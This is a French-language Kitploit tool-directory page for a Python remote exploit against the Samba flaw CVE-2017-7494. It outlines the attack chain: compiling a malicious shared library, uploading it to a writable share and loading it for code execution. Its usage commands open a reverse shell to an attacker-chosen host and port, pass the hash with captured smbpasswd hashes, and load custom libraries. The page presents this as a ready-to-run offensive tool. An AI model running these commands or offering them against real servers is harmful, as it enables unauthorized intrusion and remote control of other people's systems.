Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
noSAMBAnoCRY-CVE-2017-7494 — Exploit Python pour CVE-2017-7494 | Kitploit
Outils/GitHubGitHub/0xm4ud/nosambanocry-cve-2017-7494
Génération de PayloadsAnalyse des VulnérabilitésExploitationShellcodeTests d'IntrusionOutil d'Accès à Distance
GitHub0xm4ud/nosambanocry-cve-2017-7494

noSAMBAnoCRY-CVE-2017-7494

Exploit Python pour CVE-2017-7494

Voir le dépôt
619il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

noSAMBAnoCRY CVE-2017-7494

Exploit à distance pour la vulnérabilité SAMBA CVE-2017-7494, alias is_know_pipename!

Détails

Cet exploit est divisé en 3 parties :

  • Compile evilLib dans les architectures suivantes : x86_64, x86 ou i686
  • Trouve un partage accessible en écriture et y télécharge evilLib !
  • Charge evilLib, si tout se passe bien, RCE !

Tant que la cible est vulnérable et que la charge utile est correcte pour le système d'exploitation et l'architecture cibles, l'exploit est assez fiable.

Comment faire

Exécutez l'exploit contre votre cible et attendez l'apparition du shell :

$ python noSAMBAnoCRY.py -r RHOST
$ python noSAMBAnoCRY.py -r RHOST -u userTest -P 123 --lhost RevShellIP --lport RevShellPort 

Pour les versions de Samba 3.5.0 à 3.6.0, il suffit d'ajouter l'argument -o 1

python noSAMBAnoCRY.py -r RHOST --lhost LHOST --lport LPORT -o 1

Exécutez votre propre .so personnalisé

$ python noSAMBAnoCRY.py -r RHOST -u userTest --hashes 00000000000000000000000000000000:3DBDE697D71690A769204BEB12283678 -c cp.so

Pour un port Samba personnalisé, utilisez l'argument -p

$ python noSAMBAnoCRY.py -t RHOST -p 4450 -u userTest -P 123 --rhost shell_ip --rport shell_port

Si vous tombez sur des hashs smbpasswd et ne pouvez pas les casser, vous pouvez maintenant faire un pass-the-hash en utilisant l'argument --hashes=LM:NT

$ python noSAMBAnoCRY.py -r RHOST -u userTest --hashes=00000000000000000000000000000000:3DBDE697D71690A769204BEB12283678 --lhost RevShellIP

Avertissement

Ce dépôt est inspiré du dépôt : joxeankoret/exploit-CVE-2017-7494 et Archivaldo

Télécharger l’outil